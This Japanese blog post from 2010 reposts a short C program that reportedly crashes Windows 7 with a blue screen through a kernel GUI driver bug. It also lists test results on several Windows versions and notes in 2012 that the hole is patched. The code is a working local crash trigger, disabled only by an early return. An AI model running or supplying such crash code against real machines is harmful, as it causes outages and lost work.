LGBTQのシンボル

2010年11月21日日曜日

Windowsを殺すコード

ええ、またしてもツイッターからの転載です。驚いたもんで。
#include<Windows.h>
void main()
{
    return;
    /*****  !!!KILL WINDOWS CODE !!!! ******
    
    /****** !!!KILL WINDOWS CODE !!!! ******

    /****** !!!KILL WINDOWS CODE !!!! ******

    /****** !!!KILL WINDOWS CODE !!!! ******/
    return;
    HWND h=CreateWindow(L"#32768",0,513<<19,0,0,0,0,0,0,0,0);
    SetClassLong(h,-24,(int)DefWindowProc);
    SNDMSG(h,123,0,524296);
}
via @kenjinote

実行するとWindowsがブルースクリーンで死にます

VS2010でコンパイルしてWindows7 32bitで実行しました。

取り扱いには十分ご注意を…。面白いですが。途中のreturnは安全ピンです。実行したかったら外してください

追記

死なない環境もあるようです。機会があったらどんな環境で死ぬのか試してみたいw


  • WinXP Professional 32bit -二つのマシーンで試してどちらもブルースクリーンにはならなかった
  • WinVissta Business 32bit on VMPlayerでもブルースクリーンにならなかった
  • Win7 32/64bit どちらとも落ちた。
どちらにしろ、GUI周りのWindowsのドライバがバグってるっぽい。早く塞がれて欲しいものです。


[追記]
約二年たった今日(2012/11/19)試してみたところ、さすがに塞がれてました。安心。

0 コメント:

コメントを投稿